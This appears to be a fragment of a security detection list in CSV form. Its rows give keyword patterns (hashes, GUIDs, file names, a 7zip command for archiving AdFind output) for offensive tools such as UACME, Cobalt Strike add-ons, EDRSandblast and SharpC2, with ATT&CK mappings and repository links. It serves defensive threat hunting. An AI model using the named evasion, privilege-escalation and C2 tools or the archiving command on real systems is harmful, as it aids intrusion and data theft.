T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*7.exe a -mx3 ad.7z ad_*.txt*,offensive_tool_keyword,7zip,7zip command to zip results from adfind scans. 
attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1074.001 - T1083 - T1560.001 - T1105,TA0003 - TA0007 - TA0009,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*70527328-DCEC-4BA7-9958-B5BC3E48CE99*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*713724C3-2367-49FA-B03F-AB4B336FB405*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,0,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*73948912-CEBD-48ED-85E2-85FCD1D4F560*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,0,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*7443/new/payloads*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*76FFA92B-429B-4865-970D-4E7678AC34EA*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z
-*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-*79F54747-048D-4FD6-AEF4-7B098F923FD8*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z
-*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*7CFC52.dll*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z
-*7CFC52CD3F.dll*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z
-*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*7E47D586-DDC6-4382-848C-5CF0798084E1*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z
-*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z
-*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z
-*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z
-*7z2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*81E60DC6-694E-4F51-88FA-6F481B9A4208*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z
-*82277B35-D159-4B44-8D54-FB66EDD58D5C*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,0,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z
-*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*83035080-7788-4EA3-82EE-6C06D2E6891F*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,0,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z
-*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z
-*854A20FB-2D44-457D-992F-EF13785D2B51*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z
-*866e5289337ab033f89bc57c5274c7ca*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z
-*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*87904247-C363-4F12-A13A-3DA484913F9E*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*879A49C7-0493-4235-85F6-EBF962613A76*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z
-*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*881D4D67-46DD-4F40-A813-C9D3C8BE0965*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z
-*881D4D67-46DD-4F40-A813-C9D3C8BE0965*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z
-*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*894a784e-e04c-483c-a762-b6c03e744d0b*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z
-*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,0,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z
-*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*913d774e5cf0bfad4adfa900997f7a1a*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z
-*913d774e5cf0bfad4adfa900997f7a1a*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z
-*91EA50CD-E8DF-4EDF-A765-75354643BD0D*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack 
it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*946D24E4-201B-4D51-AF9A-3190266E0E1B*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z
